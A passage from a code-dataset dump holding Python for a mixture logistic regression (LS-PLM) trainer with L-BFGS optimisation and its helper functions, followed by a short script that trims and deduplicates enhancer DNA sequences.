"text": "import numpy as np\r\nimport function as fc\r\nimport copy\r\nimport pickle\r\nimport time\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import roc_curve,roc_auc_score\r\nimport random\r\n\r\nclass LSPLM:\r\n\r\n def __init__(self,\r\n feaNum,\r\n classNum,\r\n iterNum = 100,\r\n intercept = True,\r\n memoryNum = 10,\r\n beta = 0.1,\r\n lamb = 0.1,\r\n u_stdev=0.1,\r\n w_stdev=0.1,\r\n ):\r\n \"\"\"\r\n :param feaNum: 特征数\r\n :param classNum: 类别数\r\n :param iterNum:\r\n :param intercept:\r\n :param memoryNum:\r\n :param beta:\r\n :param lamb:\r\n :param u_stdev:\r\n :param w_stdev:\r\n \"\"\"\r\n self.classNum = classNum\r\n self.iterNum = iterNum\r\n self.intercept = intercept\r\n self.memoryNum = memoryNum\r\n self.feaNum = feaNum + 1 if self.intercept else feaNum\r\n self.lossList = []\r\n self.beta = beta\r\n self.lamb = lamb\r\n self.aucList = []\r\n self.w_stdev = w_stdev\r\n self.u_stdev = u_stdev\r\n\r\n def train(self, data,test_data):\r\n \"\"\"\r\n 训练ls-plm large scale piece-wise leanir model\r\n :param data:\r\n :return:\r\n \"\"\"\r\n ACC = []\r\n LOSS = []\r\n TEST_ACC = []\r\n TEST_LOSS = []\r\n AUC = []\r\n TEST_AUC = []\r\n\r\n # np.random.seed(0)\r\n if self.intercept:\r\n data = list(map(self.addBias, data))\r\n test_data = list(map(self.addBias, test_data))\r\n it = 0\r\n WW = [{} for _ in range(self.classNum)]\r\n for w in WW:\r\n for i in range(self.feaNum):\r\n w[i] = np.random.normal(0,self.w_stdev)\r\n WU = [{} for _ in range(self.classNum)]\r\n for u in WU:\r\n for i in range(self.feaNum):\r\n u[i] = np.random.normal(0,self.u_stdev)\r\n\r\n gradient_W = [{} for _ in range(self.classNum)]\r\n gradient_U = [{} for _ in range(self.classNum)]\r\n loss = 0.0\r\n sList = [[] for _ in range(self.classNum * 2)]\r\n roList = [[] for _ in range(self.classNum * 2)]\r\n yList = [[] for _ in range(self.classNum * 2)]\r\n alphaList = [[0] * self.memoryNum for _ in range(self.classNum * 2)]\r\n # #初始化计算 一阶梯度\r\n # gradient_W, gradient_U = fc.cal_derivative(data, weight_W, weight_U, self.norm21, self.norm1, self.feaNum)\r\n # 计算loss 和 auc\r\n loss = fc.calLoss(data, WW, WU, self.lamb, self.beta, self.feaNum)\r\n\r\n # print(\"loss: %s\" % loss)\r\n # print(\"gradient_w: is\")\r\n # for w in weight_W:\r\n # print (w)\r\n # print(\"gradient_u: is\")\r\n # for u in weight_U:\r\n # print(u)\r\n # self.firstLoss = loss\r\n # self.lossList.append(loss)\r\n\r\n pos_data = []\r\n neg_data = []\r\n for item in data:\r\n if item[0] <= 0:\r\n neg_data.append(item)\r\n else:\r\n pos_data.append(item)\r\n # M = len(pos_data) / self.Mrate\r\n\r\n\r\n while it < self.iterNum:\r\n print(\"============iterator : %s ==========\" % it)\r\n start_time = time.time()\r\n\r\n if len(neg_data)>len(pos_data):\r\n print(\"pos_data + shuffle_neg_data\")\r\n shuffle_index = list(range(len(neg_data)))\r\n random.shuffle(shuffle_index)\r\n\r\n shuffle_neg_data = []\r\n for sii in range(len(pos_data)):\r\n shuffle_neg_data.append(neg_data[shuffle_index[sii]])\r\n\r\n data = pos_data + shuffle_neg_data\r\n\r\n\r\n\r\n # 1. 计算虚梯度\r\n #计算梯度\r\n LW, LU = fc.sumCalDerivative(WW, WU, data, weight = 1)\r\n vGW, vGU = fc.virtualGradient(self.feaNum, WW, WU, LW, LU,self.beta, self.lamb)\r\n\r\n # 2. 保存虚梯度方向,用于后续确定搜索方向是否跨象限\r\n vG = vGW + vGU\r\n dir = copy.deepcopy(vG)\r\n # dirW = copy.deepcopy(vGW)\r\n # dirU = copy.deepcopy(vGU)\r\n\r\n # 3. 
利用LBFGS算法的两个循环计算下降方向, 这里会直接修改vGradient, 并确定下降方向是否跨象限\r\n fc.lbfgs(self.feaNum, vG, sList, roList, yList, alphaList,dir)\r\n\r\n # # 4. 确定下降方向是否跨象限, 这里也会直接修改vGradient\r\n # fc.fixDirection(vG, dir)\r\n\r\n # 5. 线性搜索最优解\r\n newLoss, newW = fc.backTrackingLineSearch(self.feaNum, it, loss, data, WW+WU, LW+LU, vG, dir,self.lamb, self.beta)\r\n\r\n # 打印结果\r\n newWW = newW[:len(newW)//2]\r\n newWU = newW[len(newW)//2:]\r\n # if self.save :\r\n # pickle.dump((WW,WU), open(\"save/weight\"+self.stamp+\".kpl\", \"wb\"))\r\n\r\n # 计算train 相关参数:\r\n loss = fc.calLoss(data, newWW, newWU, self.lamb, self.beta, self.feaNum)\r\n\r\n count = 0.0\r\n labels = []\r\n scores = []\r\n _tp, _tn, _p, _n = 0, 0, 0, 0\r\n for i in range(len(data)):\r\n d = data[i]\r\n result = fc.mlr(newWW, newWU, d)\r\n labels.append(d[0])\r\n scores.append(result)\r\n if d[0] == 1:\r\n _p += 1\r\n else:\r\n _n += 1\r\n\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n if result > 0.5:\r\n _tp += 1\r\n else:\r\n _tn += 1\r\n acc = count / len(data)\r\n print(\"train:\")\r\n print(\"tp = \", _tp, \" p = \", _p, \" tn = \", _tn, \" n = \", _n, \" tp/p = \", _tp / _p, \" tn/n = \", _tn / _n)\r\n ACC.append(str(acc))\r\n LOSS.append(str(loss))\r\n # 计算AUC\r\n roc_auc = roc_auc_score(labels, scores)\r\n AUC.append(str(roc_auc))\r\n\r\n # 计算test相关量\r\n count = 0.0\r\n labels = []\r\n scores = []\r\n _tp, _tn, _p, _n = 0, 0, 0, 0\r\n for i in range(len(test_data)):\r\n d = test_data[i]\r\n result = fc.mlr(newWW, newWU, d)\r\n labels.append(d[0])\r\n scores.append(result)\r\n if d[0] == 1:\r\n _p += 1\r\n else:\r\n _n += 1\r\n\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n if result > 0.5:\r\n _tp += 1\r\n else:\r\n _tn += 1\r\n test_loss = fc.calLoss(data, newWW, newWU, self.lamb, self.beta, self.feaNum)\r\n test_acc = count / len(test_data)\r\n print(\"test:\")\r\n print(\"tp = \", _tp, \" p = \", _p, \" tn = \", _tn, \" n = \", _n, \" tp/p = \", _tp / _p, \" tn/n = \", _tn / _n, )\r\n\r\n TEST_ACC.append(str(test_acc))\r\n TEST_LOSS.append(str(test_loss))\r\n # 计算AUC\r\n # fpr, tpr, thresholds = roc_curve(np.array(labels), np.array(scores), pos_label=1)\r\n test_roc_auc = roc_auc_score(labels, scores)\r\n TEST_AUC.append(str(test_roc_auc))\r\n print(\"loss \", loss, \" acc \", acc, \" auc \", roc_auc, \" test loss \", test_loss, \" test acc \", test_acc,\r\n \" test auc \", test_roc_auc)\r\n\r\n\r\n # 6. 判断是否提前终止\r\n if self.check(it, test_roc_auc):\r\n break\r\n else:\r\n # 7. 
更新各种参数\r\n self.shift(data, sList, yList, roList, WW + WU, newW, LW, LU)\r\n WW = newWW\r\n WU = newWU\r\n print(\"loss: %s\" % loss)\r\n print(\"============iterator : %s end ==========\" % it)\r\n print(\"\")\r\n it += 1\r\n\r\n print(\"use time: \", time.time() - start_time)\r\n print(\"------------------------------------------------------\\n\")\r\n\r\n\r\n\r\n # with open(\"save/result\"+self.stamp,\"a\") as fw:\r\n # fw.write(\"train_acc:\" + \" \".join(ACC)+\"\\n\")\r\n # fw.write(\"train_loss:\" + \" \".join(LOSS) + \"\\n\")\r\n # fw.write(\"train_auc:\" + \" \".join(AUC) + \"\\n\")\r\n # fw.write(\"test_acc:\" + \" \".join(TEST_ACC) + \"\\n\")\r\n # fw.write(\"test_loss:\" + \" \".join(TEST_LOSS) + \"\\n\")\r\n # fw.write(\"test_auc:\" + \" \".join(TEST_AUC) + \"\\n\")\r\n return WW, WU\r\n\r\n def shift(self,data, sList, yList, roList, W, newW, LW, LU):\r\n newLW, newLU = fc.sumCalDerivative(newW[:len(newW)//2],newW[len(newW)//2:],data)\r\n newGradient = newLW+newLU\r\n gradient = LW + LU\r\n for i in range(len(sList)):\r\n slist = sList[i]\r\n ylist = yList[i]\r\n rolist = roList[i]\r\n w = W[i]\r\n neww = newW[i]\r\n g = gradient[i]\r\n newg = newGradient[i]\r\n\r\n size = len(slist)\r\n if size == self.memoryNum:\r\n # print >> sys.stdout, \"pop 老的S, Y, RO\"\r\n slist.pop(0)\r\n ylist.pop(0)\r\n rolist.pop(0)\r\n\r\n nextS = {}\r\n nextY = {}\r\n fc.addMultInto(self.feaNum, nextS, neww, w, -1)\r\n # print \"newG: %s\" % newGradient\r\n fc.addMultInto(self.feaNum, nextY, newg, g, -1)\r\n # print \"nextS: %s\" % nextS\r\n # print \"nextY: %s\" % nextY\r\n ro = fc.dotProduct(nextS, nextY)\r\n slist.append(nextS)\r\n ylist.append(nextY)\r\n rolist.append(ro)\r\n\r\n def check(self, it, auc):\r\n # if len(self.lossList) <= 5:\r\n # self.lossList.append(newLoss)\r\n # return False\r\n # firstLoss = self.lossList[0]\r\n #\r\n # lastLoss = newLoss\r\n # reduceLoss = (firstLoss - lastLoss )\r\n # averageReduce = reduceLoss / len(self.lossList)\r\n #\r\n # reduceRatio = averageReduce / newLoss\r\n # if len(self.lossList) == 10:\r\n # self.lossList.pop(0)\r\n # self.lossList.append(lastLoss)\r\n #\r\n # if reduceRatio <= self.tol:\r\n # return True\r\n # else:\r\n # return False\r\n self.aucList.append(auc)\r\n # if it < 5 or (self.aucList[-1] < self.aucList[-2] and self.aucList[-2] < self.aucList[-3]):\r\n if it < 100:\r\n return False\r\n else:\r\n return True\r\n\r\n def addBias(self, item):\r\n \"\"\"\r\n add bias\r\n :param item:\r\n :param fN:\r\n :return:\r\n \"\"\"\r\n label, featureDic = item\r\n featureDic[self.feaNum - 1] = 1.0\r\n return (label, featureDic)"
},
{
"alpha_fraction": 0.4674254357814789,
"alphanum_fraction": 0.4861067533493042,
"avg_line_length": 23.28174591064453,
"blob_id": "7cc90f68fb377615057fe6dc812dd68a6e750fc0",
"content_id": "06a7813e2a9df7a56ae3fd47f88795b57a452687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13504,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 504,
"path": "/function.py",
"repo_name": "wuhongle/MLR",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport time\r\nimport copy\r\n\r\ndef performance(f): #定义装饰器函数,功能是传进来的函数进行包装并返回包装后的函数\r\n def fn(*args, **kw): #对传进来的函数进行包装的函数\r\n t_start = time.time() #记录函数开始时间\r\n r = f(*args, **kw) #调用函数\r\n t_end = time.time() #记录函数结束时间\r\n print ('call %s() in %fs' % (f.__name__, (t_end - t_start))) #打印调用函数的属性信息,并打印调用函数所用的时间\r\n return r #返回包装后的函数\r\n return fn #调用包装后的函数\r\n\r\ndef mlr(W, U, item):\r\n \"\"\"\r\n calculate mixture logistic regression\r\n :param U:\r\n :param W:\r\n :param x:\r\n :return:\r\n \"\"\"\r\n label, x = item\r\n prob = 0.0\r\n ux = []\r\n for u in U:\r\n ux.append(dotProduct(u, x))\r\n ux = softmax(ux)\r\n # print(ux)\r\n for index, w in enumerate(W):\r\n prob += ux[index] * sigmoid(dotProduct(w, x))\r\n # print (label, \" \", prob, x)\r\n return prob\r\n\r\n\r\ndef dotProduct(weight, featureDic):\r\n \"\"\"\r\n calculate w * x\r\n :param featureDic:\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n result = 0.0\r\n for index in featureDic:\r\n x = featureDic[index]\r\n w = weight.get(index, 0)\r\n result += x * w\r\n return result\r\n\r\ndef sigmoid(z):\r\n \"\"\"\r\n calculate sigmoid\r\n :param z:\r\n :return:\r\n \"\"\"\r\n return 1 / (1 + np.exp( -max(min(z, 35), -35) ))\r\n\r\ndef softmax(x):\r\n \"\"\"\r\n softmax a array\r\n :param x:\r\n :return:\r\n \"\"\"\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / e_x.sum()\r\n\r\n\r\ndef calculateY(X, w):\r\n Y = []\r\n for x in X:\r\n y = -(w[2] + x * w[0]) / w[1]\r\n Y.append(y)\r\n return Y\r\n\r\ndef calLoss(data, weight_W, weight_U, norm21, norm1, feaNum):\r\n \"\"\"\r\n 计算loss\r\n :param data:\r\n :param weight_W:\r\n :param weight_U:\r\n :return:\r\n \"\"\"\r\n #混合逻辑回归的loss\r\n functionLoss = calFunctionLoss(weight_W, weight_U, data)\r\n #L21正则的loss\r\n norm21Loss = calNorm21(weight_W + weight_U, feaNum)\r\n #L1正则的loss\r\n norm1Loss = calNorm1(weight_W + weight_U)\r\n print( functionLoss , norm21 * norm21Loss , norm1 * norm1Loss)\r\n return functionLoss + norm21 * norm21Loss + norm1 * norm1Loss\r\n\r\ndef calFunctionLoss(W_w, W_u, data):\r\n \"\"\"\r\n calculate the loss over all data\r\n :param w_w:\r\n :param w_u:\r\n :param data:\r\n :return:\r\n \"\"\"\r\n loss = 0.0\r\n for label, featureDic in data:\r\n #sum_u is sum(exp(uj * x))\r\n #sum_us is sum(exp(uj * x) * sigmoid(y * wi * x))\r\n sum_u = 0\r\n sum_us = 0\r\n for i in range(len(W_w)):\r\n wx = dotProduct(W_w[i], featureDic)\r\n eux = np.exp(dotProduct(W_u[i], featureDic))\r\n sum_u += eux\r\n sum_us += eux * sigmoid(label * wx)\r\n loss += np.log(sum_u) - np.log(sum_us)\r\n return loss\r\n # print(\"loss is: %s\" % loss)\r\n\r\ndef calNorm21(weight, feaNum):\r\n '''\r\n 计算norm21\r\n :param weight:\r\n :return:\r\n '''\r\n loss = 0.0\r\n for i in range(feaNum):\r\n d = 0.0\r\n #计算所有weight的第i个维度上的平方和\r\n for w in weight:\r\n d += w.get(i, 0) ** 2\r\n loss += d ** 0.5\r\n return loss\r\n\r\ndef calNorm1(weight):\r\n \"\"\"\r\n 计算norm1\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n loss = 0.0\r\n for w in weight:\r\n for v in w.values():\r\n loss += abs(v)\r\n return loss\r\n\r\ndef calDimension21(W, feaNum):\r\n \"\"\"\r\n 计算每一个维度的L2\r\n :param W:\r\n :return:{dimension1:std1, dimension2:std2 ......}\r\n \"\"\"\r\n D21 = {}\r\n for index in range(feaNum):\r\n sum = 0\r\n for w in W:\r\n sum += w.get(index, 0) ** 2\r\n if sum != 0:\r\n D21[index] = sum ** 0.5\r\n return D21\r\n\r\ndef calGradient(data, weight_W, weight_U, norm2, norm1, feaNum):\r\n \"\"\"\r\n 计算 gradient,\r\n w,u每个都有calssNum个向量\r\n :param data:\r\n :param 
weight_W:\r\n :param weight_U:\r\n :param norm2:\r\n :param norm1:\r\n :param feaNum:\r\n :return:\r\n \"\"\"\r\n gW = []\r\n gU = []\r\n\r\n\r\ndef cal_derivative(W_w, W_u, item, weight = 1):\r\n \"\"\"\r\n calculate derivative\r\n :param weight:\r\n :return:\r\n \"\"\"\r\n label, featureDic = item\r\n dir_W = []\r\n dir_U = []\r\n temp_eux = []\r\n temp_sywx = []\r\n sum_eux = 0.0\r\n sum_eux_sywx = 0.0\r\n for i in range(len(W_w)):\r\n #get all the temp exp(uj * x) and sigmoid(y * wj * x)\r\n #and get sum at the same time\r\n eux = np.exp(dotProduct(W_u[i], featureDic))\r\n sywx = sigmoid(label * dotProduct(W_w[i], featureDic))\r\n temp_eux.append(eux)\r\n temp_sywx.append(sywx)\r\n sum_eux += eux\r\n sum_eux_sywx += eux * sywx\r\n for i in range(len(W_w)):\r\n #calculate array uj and array wj\r\n dir_w = {}\r\n dir_u = {}\r\n for index in featureDic:\r\n dir_u[index] = temp_eux[i] * featureDic[index] / sum_eux - \\\r\n temp_eux[i] * temp_sywx[i] * featureDic[index] / sum_eux_sywx\r\n dir_w[index] = label * temp_eux[i] * temp_sywx[i] * ( temp_sywx[i] - 1 ) * featureDic[index] / sum_eux_sywx\r\n if label > 0:\r\n dir_u[index] *= weight\r\n dir_w[index] *= weight\r\n dir_W.append(dir_w)\r\n dir_U.append(dir_u)\r\n\r\n return dir_W, dir_U\r\n\r\ndef sumCalDerivative(WW, WU, data,weight = 1):\r\n # 计算所有样本的梯度和(所有样本的一阶导数和),weight为负样本数/正样本数。\r\n LW = [{} for _ in range(len(WW))]\r\n LU = [{} for _ in range(len(WW))]\r\n for item in data:\r\n lw, lu = cal_derivative(WW, WU, item)\r\n #如果是正样本,乘以权重,这样正样本更重要\r\n if item[0] > 0:\r\n pos_weight = weight\r\n else:\r\n pos_weight = 1\r\n for i in range(len(WW)):\r\n for index in lw[i]:\r\n LW[i].setdefault(index, 0)\r\n LW[i][index] += lw[i][index] * pos_weight\r\n for index in lu[i]:\r\n LU[i].setdefault(index, 0)\r\n LU[i][index] += lu[i][index] * pos_weight\r\n for lw in LW:\r\n for k in lw:\r\n lw[k] /= len(data)\r\n for lu in LU:\r\n for k in lu:\r\n lu[k] /= len(data)\r\n\r\n return LW, LU\r\n\r\n\r\n\r\n\r\ndef virtualGradient(feaNum, WW, WU, GW, GU,beta,lamb):\r\n \"\"\"\r\n 计算虚梯度,也就是论文中的d_ij\r\n :param feaNum:\r\n :param weight_W:\r\n :param weight_U:\r\n :param gradient_W:\r\n :param gradient_U:\r\n :param norm21:\r\n :param norm1:\r\n :return:\r\n \"\"\"\r\n #计算θ_i·\r\n D21 = calDimension21(WW + WU, feaNum)\r\n #计算v:\r\n VW = calV(GW, beta)\r\n VU = calV(GU, beta)\r\n #计算v_i·\r\n VD21 = calDimension21(VW + VU, feaNum)\r\n sumVD21 = sum(VD21.values())\r\n\r\n #\r\n #计算d_ij\r\n DW = calDij(GW, WW, VW, D21, sumVD21, beta, lamb, feaNum)\r\n DU = calDij(GU, WU, VU, D21, sumVD21, beta, lamb, feaNum)\r\n return DW, DU\r\n\r\ndef calV(L, beta):\r\n \"\"\"\r\n 计算v,包括wv, uv,这里是分别计算的\r\n (可以和到一起算,因为w,u一直都是分着算的,所以这里也分着算了。重构的时候再优化吧)\r\n :param LW:\r\n :param LU:\r\n :param beta:\r\n :param lamb:\r\n :return:\r\n \"\"\"\r\n V = copy.deepcopy(L)\r\n for v in V:\r\n for index in v:\r\n v[index] = max(abs(v[index]) - beta, 0) * sign(-v[index])\r\n return V\r\n\r\ndef calDij(L, W, V, D21, sumVD21, beta, lamb, feaNum):\r\n \"\"\"\r\n 分三种情况讨论,并计算d_i\r\n :param L: loss of θ, matrix\r\n :param W: weight,θ, matrix\r\n :param V: v , matrix\r\n :param D21: norm21, W_i· of W , vector\r\n :param sumVD21: norm21, value\r\n :param beta:\r\n :param lamb:\r\n :param feaNum:\r\n :return:\r\n \"\"\"\r\n D = [{} for _ in range(len(W))]\r\n for i,d in enumerate(D):\r\n for index in range(feaNum):\r\n if D21.get(i,0) == 0:\r\n temp = V[i].get(index, 0) * max(sumVD21 - lamb, 0) / sumVD21\r\n\r\n elif W[i].get(index, 0) == 0:\r\n s = -L[i].get(index,0)\r\n temp = max(abs(s) - 
beta, 0) * sign(s)\r\n\r\n else:\r\n s = -L[i].get(index, 0) - lamb * W[i].get(index, 0) / D21.get(index)\r\n temp = s - beta * sign(W[i].get(index, 0))\r\n\r\n if temp != 0:\r\n d[index] = temp\r\n return D\r\n\r\n\r\ndef lbfgs(feaNum, vG, sList, roList, yList, alphaList, DIR):\r\n \"\"\"\r\n 两个循环计算下降方向,拟合Hessian矩阵的 逆H 和梯度负方向的乘积,即 -H * f'\r\n :param feaNum:\r\n :param vG: matrix, 2m*d\r\n :param sList:matrix, 2m*d\r\n :param roList:matrix, 2m*d\r\n :param yList:matrix, 2m*d\r\n :param alphaList:matrix, 2m*d\r\n :return:\r\n \"\"\"\r\n for _i in range(len(sList)):\r\n vg = vG[_i]\r\n slist = sList[_i]\r\n rolist = roList[_i]\r\n ylist = yList[_i]\r\n alist = alphaList[_i]\r\n dir = DIR[_i]\r\n count = len(slist)\r\n if count > 0:\r\n indexList = list(range(0, count))\r\n indexList.reverse()\r\n for i in indexList:\r\n alist[i] = -1.0 * dotProduct(vg,slist[i]) / rolist[i]\r\n addMult(feaNum, vg, ylist[i], alist[i])\r\n\r\n lastY = ylist[-1]\r\n yDotY = dotProduct(lastY, lastY)\r\n scalar = rolist[-1] / yDotY\r\n scale(vg, scalar);\r\n\r\n for i in range(0, count):\r\n beta = dotProduct(vg, ylist[i],) / rolist[i]\r\n addMult(feaNum, vg, slist[i], -alist[i] - beta);\r\n\r\n #判断y(k)T * s(k) > 0\r\n if count > 0 and dotProduct(ylist[-1], slist[-1]) > 0:\r\n for index in vg:\r\n if sign(vg[index] != sign(dir.get(index,0))):\r\n vg[index] = dir.get(index,0)\r\n else:\r\n vG[_i] = dir\r\n\r\ndef addMult(paramCount, vecDic1, vecDic2, c):\r\n for index in range(0, paramCount):\r\n v1 = vecDic1.get(index, 0)\r\n vecDic1[index] = v1 + vecDic2.get(index, 0) * c\r\n\r\ndef addMultInto(paramCount, vec1, vec2, vec3, c):\r\n for index in range(0, paramCount):\r\n vec1[index] = vec2.get(index, 0) + vec3.get(index, 0) * c\r\n\r\n\r\ndef scale(vecDic1, c):\r\n for index in vecDic1:\r\n vecDic1[index] *= c\r\n\r\ndef fixDirection(vGW, vGU, dirW, dirU):\r\n \"\"\"\r\n 检查下降是否跨象限\r\n :param vGW:\r\n :param vGU:\r\n :param dirW:\r\n :param dirU:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef backTrackingLineSearch(feaNum, it, loss, data, W, L, vG, dir,norm21, norm1):\r\n \"\"\"\r\n 线性搜索,得到最佳步长并更新权重\r\n :param it:\r\n :param oldLoss:\r\n :param data:\r\n :param WW:\r\n :param WU:\r\n :param GW:\r\n :param GU:\r\n :param vGW:\r\n :param vGU:\r\n :return:\r\n \"\"\"\r\n alpha = 1.0\r\n backoff = 0.5\r\n if it == 0:\r\n # normalDir = dotProduct(vG, vG) ** 0.5\r\n # alpha = 1.0 / normalDir\r\n backoff = 0.1\r\n gamma = 1e-5\r\n loss_it = 0;\r\n while True:\r\n\r\n\r\n newW = getNewWeight(feaNum, W, vG, alpha, dir )\r\n\r\n new_loss = calLoss(data, newW[:len(newW)//2], newW[len(newW)//2:], norm21, norm1, feaNum)\r\n\r\n #论文中的阈值项\r\n threshold = calThreshold(dir, W, newW)\r\n\r\n if new_loss <= loss + gamma * threshold or(loss_it > 0 and new_loss > pre_loss):\r\n return new_loss, newW\r\n pre_loss = new_loss\r\n alpha *= backoff\r\n loss_it += 1\r\n\r\ndef calThreshold(dir, W, newW):\r\n \"\"\"\r\n 计算论文中阈值项\r\n :param dir:\r\n :param W:\r\n :param newW:\r\n :return:\r\n \"\"\"\r\n threshold = 0\r\n for i,d in enumerate(dir):\r\n for index in d:\r\n threshold += -d[index] * (newW[i].get(index, 0) - W[i].get(index, 0))\r\n return threshold\r\n\r\ndef getNewWeight(feaNum, W, vG, alpha, dir ):\r\n \"\"\"\r\n 计算新的参数\r\n :param feaNum:\r\n :param W:\r\n :param vG:\r\n :param alpha:\r\n :return:\r\n \"\"\"\r\n new_W = [{} for _ in range(len(W))]\r\n for i, w in enumerate(W):\r\n for index in range (feaNum):\r\n _w = w.get(index, 0)\r\n if _w == 0:\r\n _sign = sign(dir[i].get(index, 0))\r\n else:\r\n _sign = sign(_w)\r\n _new_w = 
_w + alpha * vG[i].get(index,0)\r\n if sign(_new_w) == sign(_sign):\r\n new_W[i][index] = _new_w\r\n return new_W\r\n\r\n\r\ndef check(it, loss, newLoss, WW, WU):\r\n \"\"\"\r\n 检查是否提前终止\r\n :param it:\r\n :param loss:\r\n :param newLoss:\r\n :param WW:\r\n :param WU:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef shift(sList, yList, roList, weight, newWeight, gradient, newGradient):\r\n \"\"\"\r\n 更新\r\n :param sList:\r\n :param yList:\r\n :param roList:\r\n :param weight:\r\n :param newWeight:\r\n :param gradient:\r\n :param newGradient:\r\n :return:\r\n \"\"\"\r\n pass\r\n\r\ndef sign(x):\r\n \"\"\"\r\n return 1,0,-1\r\n :param x:\r\n :return:\r\n \"\"\"\r\n if x < 0:\r\n return -1\r\n elif x > 0:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef calAcc(data, WW, WU):\r\n count = 0.0\r\n for i in range(len(data)):\r\n d = data[i]\r\n result = mlr(WW, WU, d)\r\n if abs(result - (1 + d[0]) / 2) < 0.5:\r\n count += 1\r\n return count / len(data)"
}
] | 2 |
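The file above implements a mixture logistic regression (MLR) trainer with L1/L2,1 regularization over sparse feature dicts. As a quick orientation, here is a minimal, self-contained sketch of the core scoring rule it uses, p(y=1|x) = sum_j softmax(u_j.x)_j * sigmoid(w_j.x); the toy weights and the sample point below are invented for illustration, not taken from the file.

```python
import numpy as np

def dot(w, x):
    # sparse dot product over {feature_index: value} dicts
    return sum(v * w.get(i, 0.0) for i, v in x.items())

def sigmoid(z):
    # clipped logistic, mirroring the file's overflow guard
    return 1.0 / (1.0 + np.exp(-max(min(z, 35), -35)))

def softmax(zs):
    e = np.exp(np.asarray(zs) - np.max(zs))
    return e / e.sum()

def mlr_prob(W, U, x):
    # p(y=1|x) = sum_j softmax(u_j . x)_j * sigmoid(w_j . x)
    gates = softmax([dot(u, x) for u in U])
    return sum(g * sigmoid(dot(w, x)) for g, w in zip(gates, W))

# two regions, toy (not learned) weights over three sparse features
W = [{0: 1.5, 2: -0.5}, {1: -2.0}]
U = [{0: 0.7}, {1: 0.9}]
x = {0: 1.0, 1: 0.5}
print(round(float(mlr_prob(W, U, x)), 4))
```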
hbc/gray-enhancers | https://github.com/hbc/gray-enhancers | 4315aab17bddcdd6f4de76877047f642462e888f | 97cf6a9a2dcf9391e9f51d64431f9f4770538a2b | 4a1d6d8ae1dddd479e9ba8dc58ea6b456fb03b69 | refs/heads/master | 2021-01-19T20:13:04.822057 | 2015-10-25T20:59:20 | 2015-10-25T20:59:20 | 24,687,974 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6987951993942261,
"alphanum_fraction": 0.7469879388809204,
"avg_line_length": 35.3125,
"blob_id": "dc6de9f8ef13a6424445131734923b0d925bd80a",
"content_id": "29551e32f4fa2898c5427ccf16eedf041a4be3b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1162,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 32,
"path": "/code/trim_enhancers.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe supplied enhancer sequences have two non-enhancer sequences on\nthe end, this cuts those off.\n\n>-249753741_hs_Endogenous_chr1:6052584^WCGCGTYat-59^GATTGGYat-29^GATTGGYat14^YGCGGCKSat23\nACTGGCCGCTTCACTGaactccccagcagcctgtacgtttagtcctacccgggcCCGCCGCAggGATTGGCaccgcgagcgtttcgcgtcgggagctgaacccgagaGATTGGCaggcgccgggactgccgctgtcaGACGCGAccgcccaagaCACTGCGGCTCCTCA\n\nto\n\n>-249753741_hs_Endogenous_chr1:6052584^WCGCGTYat-59^GATTGGYat-29^GATTGGYat14^YGCGGCKSat23\naactccccagcagcctgtacgtttagtcctacccgggcCCGCCGCAggGATTGGCaccgcgagcgtttcgcgtcgggagctgaacccgagaGATTGGCaggcgccgggactgccgctgtcaGACGCGAccgcccaaga\n\nthis keeps only unique sequences\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport itertools\n\nseen = set()\n\nwith open(sys.argv[1], \"r\") as in_handle:\n for name, seq in itertools.izip_longest(*[in_handle]*2):\n llen = len(seq)\n piece = seq[16:(llen-16)].strip()\n if piece not in seen:\n seen.update([piece])\n print(name.strip(), file=sys.stdout)\n print(piece, file=sys.stdout)\n else:\n print(\"%s sequence already seen, skipping %s.\" % (seq, name),\n file=sys.stderr)\n"
},
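trim_enhancers.py above removes 16 constant bases from each end of every sequence line and keeps only the first occurrence of each trimmed core. A tiny sketch of that slice-and-dedupe step; the flanks and cores here are made up, and only the 16-base trim width comes from the script.

```python
flank = 16
left, right = "A" * flank, "T" * flank
records = [left + "GATTGGC" + right, left + "GATTGGC" + right, left + "CCGCCGCA" + right]
seen = set()
for seq in records:
    core = seq[flank:len(seq) - flank]  # same slice the script applies
    if core not in seen:
        seen.add(core)
        print(core)
# prints GATTGGC and CCGCCGCA once each; the duplicate record is skipped
```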
{
"alpha_fraction": 0.5093245506286621,
"alphanum_fraction": 0.5174737572669983,
"avg_line_length": 28.67906951904297,
"blob_id": "3f14a14ddba39fe3456bbf8101b8a3c2df652dcd",
"content_id": "0e68c4dd30467c1c944b22c570dae31376a0c28a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6381,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 215,
"path": "/code/bam_to_table.py",
"repo_name": "hbc/gray-enhancers",
"src_encoding": "UTF-8",
